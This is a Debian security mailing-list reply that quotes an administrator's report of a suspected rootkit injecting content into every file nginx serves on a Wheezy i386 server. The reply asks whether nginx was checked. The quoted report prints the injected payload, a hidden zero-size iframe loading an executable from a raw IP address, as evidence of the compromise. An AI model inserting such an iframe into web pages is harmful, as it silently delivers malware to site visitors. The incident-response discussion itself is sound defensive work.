On Thu, Sep 12, 2013 at 7:48 AM, E Frank Ball III <fra...@efball.com> wrote: > Last fall there was a debian 64-bit / nginx rootkit going around, > now I've been hit with what sounds similar but on 32-bit wheezy. > > Here's a link to info on the previous 64-bit rootkit: > https://www.securelist.com/en/blog/208193935/New_64_bit_Linux_Rootkit_Doing_iFrame_Injections > > > All files served by nginx have this line inserted at the top: > > <iframe src= http://122.226.137.123:1111/yixi.exe width=0 height=0></iframe> > > Whatever it was isn't there anymore: > Connecting to 122.226.137.123:1111... failed: Connection refused. > > I tar'd up /lib/modules/3.2.0-4-686-pae/kernel, copied it to another > Debian Wheezy i386 machine in a safe environment and did a diff -r. No > difference. > > No ismod line in /etc/rc.local > > I haven't been able to find anything. Googling doesn't show anything > similar for debian wheezy i386, only sqeeze 64-bit. > > I was using nginx-light from dotdeb.org. I uninstalled nginx and tried > the nginx-light from debian wheezy but it made no difference. > > This machine was built on July 19th. I've uninstalled nginx. I'll hold > off rebuilding for now, maybe somebody here has some ideas? > > E Frank Ball fra...@efball.com
Just out of curiosity, did you back up nginx and check it as well? -- Joel Rees Be careful where you see conspiracy. Look first in your own heart. -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/caar43iojy_q8kuu47y+ah+v0e81vtnwykh2f6lvvcowqans...@mail.gmail.com